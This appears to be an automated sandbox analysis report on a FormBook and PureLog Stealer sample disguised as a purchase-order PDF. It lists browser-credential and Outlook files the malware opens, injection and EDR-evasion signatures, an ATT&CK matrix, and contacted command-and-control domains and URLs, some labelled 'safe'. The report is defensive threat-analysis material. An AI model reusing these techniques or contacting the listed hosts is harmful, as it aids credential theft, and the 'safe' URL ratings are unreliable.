                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 5.2.PO 2025918 pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.PO 2025918 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.3895858991.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2458301870.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3898145012.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3895986128.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3896619038.0000000005FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2460325125.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.PO 2025918 pdf.exe.43d7590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO 2025918 pdf.exe.43d7590.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO 2025918 pdf.exe.5c10000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO 2025918 pdf.exe.5c10000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO 2025918 pdf.exe.37c459c.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO 2025918 pdf.exe.37c459c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO 2025918 pdf.exe.35a276c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2220434300.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2211278593.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2200491712.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\ROUTE.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 5.2.PO 2025918 pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.PO 2025918 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.3895858991.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2458301870.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3898145012.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3895986128.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3896619038.0000000005FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2460325125.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.PO 2025918 pdf.exe.43d7590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO 2025918 pdf.exe.43d7590.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO 2025918 pdf.exe.5c10000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO 2025918 pdf.exe.5c10000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO 2025918 pdf.exe.37c459c.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO 2025918 pdf.exe.37c459c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO 2025918 pdf.exe.35a276c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2220434300.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2211278593.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2200491712.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading                      		412
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		121
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism                      		11
                      Disable or Modify Tools                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		41
                      Virtualization/Sandbox Evasion                      		Security Account Manager41
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Data from Local System                      		4
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture4
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism                      		Cached Domain Credentials113
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                      Software Packing                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Timestomp                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      DLL Side-Loading                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590629 Sample: PO 2025918 pdf.exe Startdate: 14/01/2025 Architecture: WINDOWS Score: 100 35 www.letsbookcruise.xyz 2->35 37 zcdn.8383dns.com 2->37 39 15 other IPs or domains 2->39 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected PureLog Stealer 2->49 51 Yara detected FormBook 2->51 55 5 other signatures 2->55 10 PO 2025918 pdf.exe 4 2->10         started        signatures3 53 Performs DNS queries to domains with low reputation 35->53 process4 file5 33 C:\Users\user\...\PO 2025918 pdf.exe.log, ASCII 10->33 dropped 67 Adds a directory exclusion to Windows Defender 10->67 69 Injects a PE file into a foreign processes 10->69 14 PO 2025918 pdf.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 14->73 19 mIrIhAjAJblou.exe 14->19 injected 75 Loading BitLocker PowerShell Module 17->75 22 conhost.exe 17->22         started        process9 signatures10 57 Found direct / indirect Syscall (likely to bypass EDR) 19->57 24 ROUTE.EXE 13 19->24         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 24->59 61 Tries to harvest and steal browser information (history, passwords, etc) 24->61 63 Modifies the context of a thread in another process (thread injection) 24->63 65 3 other signatures 24->65 27 mIrIhAjAJblou.exe 24->27 injected 31 firefox.exe 24->31         started        process13 dnsIp14 41 www.qzsazi.info 47.83.1.90, 49487, 49488, 49489 VODANETInternationalIP-BackboneofVodafoneDE United States 27->41 43 www.actionhub.live 67.223.117.189, 49475, 49476, 49477 VIMRO-AS15189US United States 27->43 45 7 other IPs or domains 27->45 71 Found direct / indirect Syscall (likely to bypass EDR) 27->71 signatures15

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      PO 2025918 pdf.exe33%VirustotalBrowse
                      PO 2025918 pdf.exe34%ReversingLabsWin32.Virus.Virut
                      PO 2025918 pdf.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.zucchini.pro/tqv2/?Gxq=1VbhX6&t0A=mw5EMDe107YJTqugc68gmErc1Hs+Bqgx5FZV14wN+wWnYz/1vECwz9qX0523rVAHVbCkyePm1aNLCJN6m48zyzkbcjQAczVPINQnyJ55BFcYg7GslxzSN34k4b/zmS+IfA==0%Avira URL Cloudsafe
                      http://maximumgroup.co.za/ktot/?Gxq=1VbhX6&t0A=QtQc2mqNJwvMGBSonF19Oj93OccDibq2plWHvEnyVDfp5Gg90%Avira URL Cloudsafe
                      https://www.fasthosts.co.uk/domain-names/search/?domain=$0%Avira URL Cloudsafe
                      http://www.100millionjobs.africa/ktot/?Gxq=1VbhX6&t0A=QtQc2mqNJwvMGBSonF19Oj93OccDibq2plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4cm5qqwpB+o9+wjMZc6zOEOHj6XVSyoPWAhOlCHSGIpA7arg==0%Avira URL Cloudsafe
                      http://www.actionhub.live/gq43/0%Avira URL Cloudsafe
                      http://www.truckgoway.info/m320/?t0A=Ph0JwVcw7zzuTeHg00MwOUpuuzX2vc4K5eH0o0l2w/5oKsNqReXVchdY7BGekisn6nC+H3gPoTPDUk5nD7LsllCIycJgVOFGc42mqBi0wPhTxFehoqUxxUf8xIGnP1n2EQ==&Gxq=1VbhX60%Avira URL Cloudsafe
                      https://static.fasthosts.co.uk/icons/favicon.ico0%Avira URL Cloudsafe
                      http://www.actionhub.live/gq43/?t0A=h/dnkFjaM/BlMTbeYCbPPPvCOUuyeqTz2FnmuGYc567+HDEruSEWMN2Hn86y4gYUgaAN9U29KGW+/f0RM4NOG85h61EUnTrHdBHCQyPsxSiY4d4RTFSWTaZW3nKuaFCelg==&Gxq=1VbhX60%Avira URL Cloudsafe
                      http://www.letsbookcruise.xyz/coi2/0%Avira URL Cloudsafe
                      http://www.qzsazi.info/bqha/0%Avira URL Cloudsafe
                      https://www.fasthosts.co.uk?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_do_0%Avira URL Cloudsafe
                      http://www.truckgoway.info/m320/0%Avira URL Cloudsafe
                      http://www.x3kwqc5tye4vl90y.top/3541/?t0A=hUAT8pha3r4H+t9+S3MxJs6WhIsd+DYEOZth0k9fm5KLJvCulAvDEPbOc8wYZ2nfufyvJ6Jk1FtS1iVn+RgDiEmRDBrl1krw2W73iPr4/Jg/5IC96P6rf6fefVYTNIm+pw==&Gxq=1VbhX60%Avira URL Cloudsafe
                      http://www.aloezhealthcare.info/he9k/0%Avira URL Cloudsafe
                      http://www.qzsazi.info/bqha/?t0A=XaQS++1s5Z2sQk6jmp6aqlAdT5jjUiNTMtu3zec/e2geVsN/mry3D0SmJYJJ828Xh6gONHNOHW6qADxKsznE4a8JCTBXzC8s0SdcTgnAYDNlXd2JyzVPT3Fze3sMGaFiAg==&Gxq=1VbhX60%Avira URL Cloudsafe
                      http://www.100millionjobs.africa/ktot/0%Avira URL Cloudsafe
                      http://www.vh5g.sbs/0%Avira URL Cloudsafe
                      http://www.letsbookcruise.xyz0%Avira URL Cloudsafe
                      http://maximumgroup.co.za/ktot/?Gxq=1VbhX6&amp;t0A=QtQc2mqNJwvMGBSonF19Oj93OccDibq2plWHvEnyVDfp5Gg90%Avira URL Cloudsafe
                      http://www.vh5g.sbs/54nj/0%Avira URL Cloudsafe
                      http://www.x3kwqc5tye4vl90y.top/3541/0%Avira URL Cloudsafe
                      https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.qzsazi.info
                      		47.83.1.90
                      		truefalse
                        		unknown
                        www.aloezhealthcare.info
                        		213.171.195.105
                        		truefalse
                          		unknown
                          truckgoway.info
                          		84.32.84.32
                          		truefalse
                            		unknown
                            www.zucchini.pro
                            		199.59.243.228
                            		truefalse
                              		unknown
                              www.vh5g.sbs
                              		188.114.97.3
                              		truefalse
                                		unknown
                                www.actionhub.live
                                		67.223.117.189
                                		truefalse
                                  		unknown
                                  100millionjobs.africa
                                  		136.243.64.147
                                  		truefalse
                                    		unknown
                                    zcdn.8383dns.com
                                    		134.122.133.80
                                    		truefalse
                                      		high
                                      natroredirect.natrocdn.com
                                      		85.159.66.93
                                      		truefalse
                                        		high
                                        www.100millionjobs.africa
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          18.31.95.13.in-addr.arpa
                                          		unknown
                                          		unknownfalse
                                            		high
                                            www.v89ey584d.shop
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.truckgoway.info
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.letsbookcruise.xyz
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.x3kwqc5tye4vl90y.top
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.hwak.live
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.actionhub.live/gq43/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.actionhub.live/gq43/?t0A=h/dnkFjaM/BlMTbeYCbPPPvCOUuyeqTz2FnmuGYc567+HDEruSEWMN2Hn86y4gYUgaAN9U29KGW+/f0RM4NOG85h61EUnTrHdBHCQyPsxSiY4d4RTFSWTaZW3nKuaFCelg==&Gxq=1VbhX6false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.qzsazi.info/bqha/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.truckgoway.info/m320/?t0A=Ph0JwVcw7zzuTeHg00MwOUpuuzX2vc4K5eH0o0l2w/5oKsNqReXVchdY7BGekisn6nC+H3gPoTPDUk5nD7LsllCIycJgVOFGc42mqBi0wPhTxFehoqUxxUf8xIGnP1n2EQ==&Gxq=1VbhX6false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.zucchini.pro/tqv2/?Gxq=1VbhX6&t0A=mw5EMDe107YJTqugc68gmErc1Hs+Bqgx5FZV14wN+wWnYz/1vECwz9qX0523rVAHVbCkyePm1aNLCJN6m48zyzkbcjQAczVPINQnyJ55BFcYg7GslxzSN34k4b/zmS+IfA==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.letsbookcruise.xyz/coi2/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.100millionjobs.africa/ktot/?Gxq=1VbhX6&t0A=QtQc2mqNJwvMGBSonF19Oj93OccDibq2plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4cm5qqwpB+o9+wjMZc6zOEOHj6XVSyoPWAhOlCHSGIpA7arg==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.qzsazi.info/bqha/?t0A=XaQS++1s5Z2sQk6jmp6aqlAdT5jjUiNTMtu3zec/e2geVsN/mry3D0SmJYJJ828Xh6gONHNOHW6qADxKsznE4a8JCTBXzC8s0SdcTgnAYDNlXd2JyzVPT3Fze3sMGaFiAg==&Gxq=1VbhX6false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.truckgoway.info/m320/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.100millionjobs.africa/ktot/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.x3kwqc5tye4vl90y.top/3541/?t0A=hUAT8pha3r4H+t9+S3MxJs6WhIsd+DYEOZth0k9fm5KLJvCulAvDEPbOc8wYZ2nfufyvJ6Jk1FtS1iVn+RgDiEmRDBrl1krw2W73iPr4/Jg/5IC96P6rf6fefVYTNIm+pw==&Gxq=1VbhX6false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.vh5g.sbs/54nj/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.aloezhealthcare.info/he9k/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.x3kwqc5tye4vl90y.top/3541/false
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabROUTE.EXE, 00000008.00000002.3900060240.0000000007A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/ac/?q=ROUTE.EXE, 00000008.00000002.3900060240.0000000007A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://maximumgroup.co.za/ktot/?Gxq=1VbhX6&t0A=QtQc2mqNJwvMGBSonF19Oj93OccDibq2plWHvEnyVDfp5Gg9ROUTE.EXE, 00000008.00000002.3898549588.000000000406C000.00000004.10000000.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000003D4C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://tempuri.org/DataSet1.xsdPO 2025918 pdf.exefalse
                                                            		high
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ROUTE.EXE, 00000008.00000002.3900060240.0000000007A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.fasthosts.co.uk/domain-names/search/?domain=$ROUTE.EXE, 00000008.00000002.3898549588.0000000004846000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3899866367.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000004526000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ROUTE.EXE, 00000008.00000002.3900060240.0000000007A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.ecosia.org/newtab/ROUTE.EXE, 00000008.00000002.3900060240.0000000007A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ac.ecosia.org/autocomplete?q=ROUTE.EXE, 00000008.00000002.3900060240.0000000007A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.google.comROUTE.EXE, 00000008.00000002.3898549588.0000000003A24000.00000004.10000000.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000003704000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2748637033.00000000162B4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://fasthosts.co.uk/mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000004526000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchROUTE.EXE, 00000008.00000002.3900060240.0000000007A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://static.fasthosts.co.uk/icons/favicon.icoROUTE.EXE, 00000008.00000002.3898549588.0000000004846000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3899866367.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000004526000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.vh5g.sbs/ROUTE.EXE, 00000008.00000002.3898549588.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000003896000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.fasthosts.co.uk?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_do_ROUTE.EXE, 00000008.00000002.3898549588.0000000004846000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3899866367.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000004526000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://maximumgroup.co.za/ktot/?Gxq=1VbhX6&amp;t0A=QtQc2mqNJwvMGBSonF19Oj93OccDibq2plWHvEnyVDfp5Gg9ROUTE.EXE, 00000008.00000002.3898549588.000000000406C000.00000004.10000000.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3896717741.0000000003D4C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO 2025918 pdf.exe, 00000000.00000002.2200491712.00000000033E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ROUTE.EXE, 00000008.00000002.3900060240.0000000007A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.letsbookcruise.xyzmIrIhAjAJblou.exe, 0000000A.00000002.3898145012.00000000057E8000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
